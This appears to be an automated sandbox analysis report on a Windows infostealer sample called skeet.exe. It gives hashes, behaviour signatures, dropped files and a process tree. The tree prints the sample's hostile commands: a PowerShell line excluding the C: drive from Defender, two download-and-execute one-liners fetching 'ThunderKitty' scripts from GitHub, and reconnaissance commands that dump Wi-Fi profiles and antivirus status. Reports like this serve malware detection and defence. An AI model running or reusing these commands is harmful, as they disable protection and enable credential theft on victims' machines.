Analysis

  • max time kernel
    65s
  • max time network
    67s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/10/2024, 09:14

General

  • Target

    skeet.exe

  • Size

    9.8MB

  • MD5

    5caf8a4e165d0ede23ca16c1954e6e4e

  • SHA1

    298f055ae4c3fee613b994c2450454b4ca311abe

  • SHA256

    889fcffb92c1e52ec1ed263476298bf0dee82c5dddbcf0e5e0c9e6c42cfd55b0

  • SHA512

    74e5950bd46e169ad3583f2155b2ef414e6f862fd26bbf1f32bc3b91a0ef03e15b76967d58661b3a1d273303f12103d650b659ddc6684be5de0e58746dc52c97

  • SSDEEP

    98304:C3BUxzQ38BsPGlgw97DB7prt8EREv/lLl8EnGpaeiWZ:C3138Bdxiv/lLl8PZ

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\skeet.exe
    "C:\Users\Admin\AppData\Local\Temp\skeet.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -C "Add-MpPreference -ExclusionPath 'C:'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4852
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sbjdvwma\sbjdvwma.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4120
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E15.tmp" "c:\Users\Admin\AppData\Local\Temp\sbjdvwma\CSC60F77C2CB016400CBE5387D18B2CE1B4.TMP"
          4⤵
            PID:4948
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:4540
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup administrators
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2348
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            4⤵
              PID:3264
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:4212
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /all
            3⤵
              PID:2116
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4272
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:4968
              • C:\Windows\system32\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /displaydns
                3⤵
                • Gathers network information
                PID:1520
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4676
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup
                  4⤵
                    PID:4620
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                  3⤵
                    PID:4480
                  • C:\Windows\system32\NETSTAT.EXE
                    "C:\Windows\system32\NETSTAT.EXE" -ano
                    3⤵
                    • System Network Connections Discovery
                    • Gathers network information
                    PID:1092
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                    3⤵
                      PID:4772
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /all
                      3⤵
                      • Gathers network information
                      PID:2272
                    • C:\Windows\system32\ROUTE.EXE
                      "C:\Windows\system32\ROUTE.EXE" print
                      3⤵
                        PID:5112
                      • C:\Windows\system32\ARP.EXE
                        "C:\Windows\system32\ARP.EXE" -a
                        3⤵
                        • Network Service Discovery
                        PID:1532
                      • C:\Windows\system32\netsh.exe
                        "C:\Windows\system32\netsh.exe" wlan show profile
                        3⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:2900

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                    Filesize

                    2KB

                    MD5

                    d85ba6ff808d9e5444a4b369f5bc2730

                    SHA1

                    31aa9d96590fff6981b315e0b391b575e4c0804a

                    SHA256

                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                    SHA512

                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    192B

                    MD5

                    72d8a1c03b9fc394f0ad124990964a82

                    SHA1

                    9b91dccfc411f3f07639241080a104cd8ec6b907

                    SHA256

                    7dc1274192dea71c411659e3dc04b9a1d10f0f2f26b2a12801a7cb04cc02dfed

                    SHA512

                    5dccd670dafefceaba06ee80843a10912dc39dfe954cc62cfa1426feb20b90c69ee7a3be00a43b48602086f459f595934d569f80e9ec91eab6ad02bb57b5c700

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    1KB

                    MD5

                    76bb094bc0304e5ff8dba4a589283977

                    SHA1

                    555bf7b01d28c0bbd750417942e04150822060ae

                    SHA256

                    aeed2f53ea15ff740eaf33b3f6b47c75f7e6201736d82715c58d9f88176388b8

                    SHA512

                    2cd044e53f2bda79e0412227813dfee9a1a440e3ac12818a5430cc38ef066c332106dcff6960a49fc0a52fd7c6dd6db5b4b2812c2ee859a48413f97368389b47

                  • C:\Users\Admin\AppData\Local\Temp\RES9E15.tmp

                    Filesize

                    1KB

                    MD5

                    14d67f35af5ab9a08a42737866ec7e65

                    SHA1

                    790568260765c7b737fa7bbca4aa7f580079f31e

                    SHA256

                    17534dbe64cb900ac7a6ecbba64a9eb068b5df2ea6a0c43d140d9a0581390297

                    SHA512

                    ed72785316fe9c0f760806091e733bb6f97aac1453f2ae766a69c574e735c79f45f20b2e5e2815d8938fdc55f4d0138301d72bebede8873cf176acd6f66af785

                  • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

                    Filesize

                    408KB

                    MD5

                    51be6b25d4ae522b62774080eadc8317

                    SHA1

                    32ee013c77b6cb0be90ef29cbedbe366270ab9af

                    SHA256

                    074a17034b1b488468433db6772d711984d2fe8eafc58e02d7bc2ccb8cbbaee0

                    SHA512

                    4ab44f7e7316edc31fda3e3fde2f5deef7fb18be47e8fb928790ae381853eb4baaa345520e8906381f2d6afa942a2a10794658792b1fc198ba357bd047310447

                  • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

                    Filesize

                    23KB

                    MD5

                    1d8d933542597b22374b5a409da0a93a

                    SHA1

                    395dfaf1e4058c5bef3eb97f38ad5f952fea23cc

                    SHA256

                    9c7202f66643055567fdbc4fcce850474937170e6d1379062e64c81c62c600b7

                    SHA512

                    73a0ecf58d36dd2313d33839824984fa9b22932d791431cc2c047a015c36b6733edbc4e5a88fe458588082aed5f63c11a91c0731a69b8f21a8c2dd4c1374d6df

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nljyx1fe.g2z.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • C:\Users\Admin\AppData\Local\Temp\sbjdvwma\sbjdvwma.dll

                    Filesize

                    4KB

                    MD5

                    e6d908952ebb5ece48022ba01b366a95

                    SHA1

                    fbd4488a9152c71b517878968ee32fb9fffb3f74

                    SHA256

                    077252361ff6ac1eb869d21f3fb84ce23c99d5bac9e92ef0868b5d209e92b26b

                    SHA512

                    5bafdba49a5811775fcf550203fa6b0619d189ae7a5f3f963f5c2617eab88100bab6037359a65018c0068d12402e98ad2d82874fbaeaad3beebd518f5912ce01

                  • \??\c:\Users\Admin\AppData\Local\Temp\sbjdvwma\CSC60F77C2CB016400CBE5387D18B2CE1B4.TMP

                    Filesize

                    652B

                    MD5

                    8799949be1690da7c6c9296c2dcfbac3

                    SHA1

                    bdcd407d1c22b35add32b114533aa1ba0b9d3504

                    SHA256

                    7c79b78cc7405aebf03613657d8b52fb6976a6a5aa1695f2e8d60402b2e93d3d

                    SHA512

                    7d4be9929181551b104adba7225bb3442cc895ead3ff922446b94b934ccc9baeb79a359869ec1ba6ff4d6c6070ac3a173865a427aad5ff7ca583e2fcb658701c

                  • \??\c:\Users\Admin\AppData\Local\Temp\sbjdvwma\sbjdvwma.0.cs

                    Filesize

                    1KB

                    MD5

                    8a1e7edb2117ec5dde9a07016905923b

                    SHA1

                    0155dbeeb16333e2eaa767b0209750efee56f47f

                    SHA256

                    c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                    SHA512

                    4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                  • \??\c:\Users\Admin\AppData\Local\Temp\sbjdvwma\sbjdvwma.cmdline

                    Filesize

                    369B

                    MD5

                    fb56f73da02fc735a172aa4c23237392

                    SHA1

                    f38ee48dc4b2be478de6a1fb30b3519875c51354

                    SHA256

                    b41a40a56b2757db79020cb0f5d8430cec9ab743bae9c175c0e470a68bf0d3a2

                    SHA512

                    0f35093c7ae34965ad86baf85cbd9d1a538869f5daa63aef1fbdbb9cb79d93a609c479d05a08f34426953ffe8db776dc6536033ee44f93dcb5fa43456e74cff7

                  • memory/2268-46-0x00007FFDE1090000-0x00007FFDE1B51000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2268-51-0x00000245DBB60000-0x00000245DC306000-memory.dmp

                    Filesize

                    7.6MB

                  • memory/2268-34-0x00007FFDE1090000-0x00007FFDE1B51000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2268-32-0x00007FFDE1090000-0x00007FFDE1B51000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2268-61-0x00007FFDE1090000-0x00007FFDE1B51000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2268-57-0x00000245DAF20000-0x00000245DB06E000-memory.dmp

                    Filesize

                    1.3MB

                  • memory/3592-41-0x00007FFDE1090000-0x00007FFDE1B51000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3592-50-0x00007FFDE1090000-0x00007FFDE1B51000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3592-49-0x000001746AA20000-0x000001746AB6E000-memory.dmp

                    Filesize

                    1.3MB

                  • memory/3592-45-0x00007FFDE1090000-0x00007FFDE1B51000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/3592-36-0x00007FFDE1090000-0x00007FFDE1B51000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4852-75-0x0000023A9B960000-0x0000023A9B98A000-memory.dmp

                    Filesize

                    168KB

                  • memory/4852-76-0x0000023A9B960000-0x0000023A9B984000-memory.dmp

                    Filesize

                    144KB

                  • memory/4852-3-0x00007FFDE1093000-0x00007FFDE1095000-memory.dmp

                    Filesize

                    8KB

                  • memory/4852-71-0x0000023A9AE50000-0x0000023A9AE58000-memory.dmp

                    Filesize

                    32KB

                  • memory/4852-35-0x00007FFDE1090000-0x00007FFDE1B51000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4852-108-0x0000023A9B960000-0x0000023A9B972000-memory.dmp

                    Filesize

                    72KB

                  • memory/4852-109-0x0000023A9B950000-0x0000023A9B95A000-memory.dmp

                    Filesize

                    40KB

                  • memory/4852-31-0x0000023A9ADE0000-0x0000023A9AE02000-memory.dmp

                    Filesize

                    136KB

                  • memory/4852-118-0x0000023A9B070000-0x0000023A9B1BE000-memory.dmp

                    Filesize

                    1.3MB

                  • memory/4852-119-0x00007FFDE1090000-0x00007FFDE1B51000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4852-4-0x00007FFDE1090000-0x00007FFDE1B51000-memory.dmp

                    Filesize

                    10.8MB